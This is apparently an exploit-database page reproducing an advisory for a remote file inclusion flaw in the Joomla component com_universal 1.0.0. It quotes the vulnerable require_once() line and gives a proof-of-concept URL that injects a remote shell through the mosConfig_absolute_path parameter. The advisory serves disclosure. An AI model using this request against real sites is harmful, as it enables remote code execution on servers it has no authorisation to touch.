header-logo
Suggest Exploit
vendor:
Joomla component com_universal (UWCMS Universal Web CMS)
by:
eidelweiss
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Joomla component com_universal (UWCMS Universal Web CMS)
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Joomla component com_universal <= Remote File Inclusion Vulnerability exploit

The Joomla component com_universal (UWCMS Universal Web CMS) version 1.0.0 is vulnerable to remote file inclusion. The vulnerability is present in the 'config.html.php' file, where the 'mosConfig_absolute_path' parameter is not properly validated before being used in a require_once() function. An attacker can exploit this vulnerability by injecting a malicious URL in the 'mosConfig_absolute_path' parameter, allowing them to include and execute arbitrary files on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Joomla component com_universal to a patched version that properly validates user input before using it in a require_once() function.
Source

Exploit-DB raw data:

###########################################################
	Joomla component com_universal <= Remote File Inclusion Vulnerability exploit
###########################################################

[+]Software:	Joomla component com_universal (UWCMS Universal Web CMS)
[+]Version:	1.0.0
[+]License:	http://www.gnu.org/copyleft/gpl.html GNU/GPL
[+]Source:	http://uwcms.sourceforge.net
[+]CWE ID :	98
[+]Security Risk:	High
[+]Remote Exploit:	Yes

###########################################################
[+]Author:	eidelweiss
[+]Contact:	eidelweiss[at]cyberservices[dot]com
[+]Thank`s:	sp3x (securityreason) - JosS (hack0wn) - r0073r & 0x1D (inj3ct0r)
[+]Special:	[D]eal [C]yber - syabilla_putri (miss u) , psychotic_girl (dodol :P) , all my friends
###########################################################

-=[ VULN ]=-

[-]	/includes/config/config.html.php

	global $mosConfig_absolute_path;
	require_once($mosConfig_absolute_path."/administrator/components/com_universal/includes/config/configuracion.php");

-=[ P0C ]=-

	http://127.0.0.1//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path= [sh3ll inj3ct0r]

###########################################################

Navigation

Suggest Exploit

Services By CQR